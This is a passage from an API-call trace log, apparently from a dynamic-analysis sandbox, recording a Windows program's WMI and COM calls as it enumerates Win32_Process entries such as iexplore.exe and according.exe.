[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5513730) returned 0x0 [0264.429] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5513730, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.429] WbemDefPath:IUnknown:Release (This=0x5513730) returned 0x3 [0264.429] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.429] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.429] WbemDefPath:IUnknown:Release (This=0x55146c8) returned 0x2 [0264.429] WbemDefPath:IUnknown:Release (This=0x55146c8) returned 0x1 [0264.429] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.429] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.429] WbemDefPath:IUnknown:QueryInterface (in: This=0x55146c8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55146c8) returned 0x0 [0264.429] WbemDefPath:IUnknown:AddRef (This=0x55146c8) returned 0x3 [0264.430] WbemDefPath:IUnknown:Release (This=0x55146c8) returned 0x2 [0264.430] WbemDefPath:IWbemPath:SetText (This=0x55146c8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2376\"") returned 0x0 [0264.430] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.430] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.430] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.430] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.430] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.430] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.430] IWbemClassObject:Get (in: This=0x550d580, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c8fe0*=0, plFlavor=0x23c8fe4*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x23c8fe0*=8, plFlavor=0x23c8fe4*=0) returned 0x0 [0264.430] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0264.430] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0264.430] IWbemClassObject:Get (in: This=0x550d580, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c8fe0*=8, plFlavor=0x23c8fe4*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x23c8fe0*=8, plFlavor=0x23c8fe4*=0) returned 0x0 [0264.430] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0264.430] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0264.430] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.431] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x550d9d8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x550d9d8) returned 0x0 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.432] IUnknown:AddRef (This=0x550d9d8) returned 0x3 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x550d9dc) returned 0x0 [0264.432] IMarshal:GetUnmarshalClass (in: This=0x550d9dc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.432] IUnknown:Release (This=0x550d9dc) returned 0x3 [0264.432] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.432] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.432] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.433] IUnknown:Release (This=0x550d9d8) returned 0x2 [0264.433] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.433] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.433] IUnknown:QueryInterface (in: This=0x550d9d8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x550d9d8) returned 0x0 [0264.433] IUnknown:AddRef (This=0x550d9d8) returned 0x4 [0264.433] IUnknown:Release (This=0x550d9d8) returned 0x3 [0264.433] IUnknown:Release (This=0x550d9d8) returned 0x2 [0264.433] CoTaskMemFree (pv=0x54ba238) [0264.433] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.433] IUnknown:AddRef (This=0x550d9d8) returned 0x3 [0264.433] IWbemClassObject:Get (in: This=0x550d9d8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.433] IWbemClassObject:Get (in: This=0x550d9d8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3444\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.433] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3444\"") returned 0x5e [0264.433] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3444\"") returned 0x5e [0264.433] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.433] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.433] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.433] IUnknown:Release (This=0x601a94) returned 0x1 [0264.434] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba238) returned 0x0 [0264.434] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba238, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.434] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba238, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55151b8) returned 0x0 [0264.434] WbemDefPath:IUnknown:Release (This=0x54ba238) returned 0x0 [0264.434] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55151b8) returned 0x0 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.435] WbemDefPath:IUnknown:AddRef (This=0x55151b8) returned 0x3 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5513808) returned 0x0 [0264.435] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5513808, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.435] WbemDefPath:IUnknown:Release (This=0x5513808) returned 0x3 [0264.435] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.435] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.435] WbemDefPath:IUnknown:Release (This=0x55151b8) returned 0x2 [0264.435] WbemDefPath:IUnknown:Release (This=0x55151b8) returned 0x1 [0264.435] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.435] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x55151b8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55151b8) returned 0x0 [0264.435] WbemDefPath:IUnknown:AddRef (This=0x55151b8) returned 0x3 [0264.436] WbemDefPath:IUnknown:Release (This=0x55151b8) returned 0x2 [0264.436] WbemDefPath:IWbemPath:SetText (This=0x55151b8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3444\"") returned 0x0 [0264.436] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.436] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.436] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.436] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.436] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.436] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.436] IWbemClassObject:Get (in: This=0x550d9d8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c9874*=0, plFlavor=0x23c9878*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="according.exe", varVal2=0x0), pType=0x23c9874*=8, plFlavor=0x23c9878*=0) returned 0x0 [0264.436] SysStringByteLen (bstr="according.exe") returned 0x1a [0264.436] SysStringByteLen (bstr="according.exe") returned 0x1a [0264.436] IWbemClassObject:Get (in: This=0x550d9d8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c9874*=8, plFlavor=0x23c9878*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="according.exe", varVal2=0x0), pType=0x23c9874*=8, plFlavor=0x23c9878*=0) returned 0x0 [0264.436] SysStringByteLen (bstr="according.exe") returned 0x1a [0264.436] SysStringByteLen (bstr="according.exe") returned 0x1a [0264.436] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.436] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x6717f0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.437] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x6717f0) returned 0x0 [0264.437] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.437] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.437] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.438] IUnknown:AddRef (This=0x6717f0) returned 0x3 [0264.438] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.438] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.438] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x6717f4) returned 0x0 [0264.438] IMarshal:GetUnmarshalClass (in: This=0x6717f4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.438] IUnknown:Release (This=0x6717f4) returned 0x3 [0264.438] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.438] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.438] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.438] IUnknown:Release (This=0x6717f0) returned 0x2 [0264.440] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.440] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.440] IUnknown:QueryInterface (in: This=0x6717f0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x6717f0) returned 0x0 [0264.440] IUnknown:AddRef (This=0x6717f0) returned 0x4 [0264.440] IUnknown:Release (This=0x6717f0) returned 0x3 [0264.440] IUnknown:Release (This=0x6717f0) returned 0x2 [0264.440] CoTaskMemFree (pv=0x54ba238) [0264.440] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.440] IUnknown:AddRef (This=0x6717f0) returned 0x3 [0264.440] IWbemClassObject:Get (in: This=0x6717f0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.440] IWbemClassObject:Get (in: This=0x6717f0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3592\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.440] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3592\"") returned 0x5e [0264.440] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3592\"") returned 0x5e [0264.440] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.440] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.441] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.441] IUnknown:Release (This=0x601a94) returned 0x1 [0264.442] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0264.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.443] 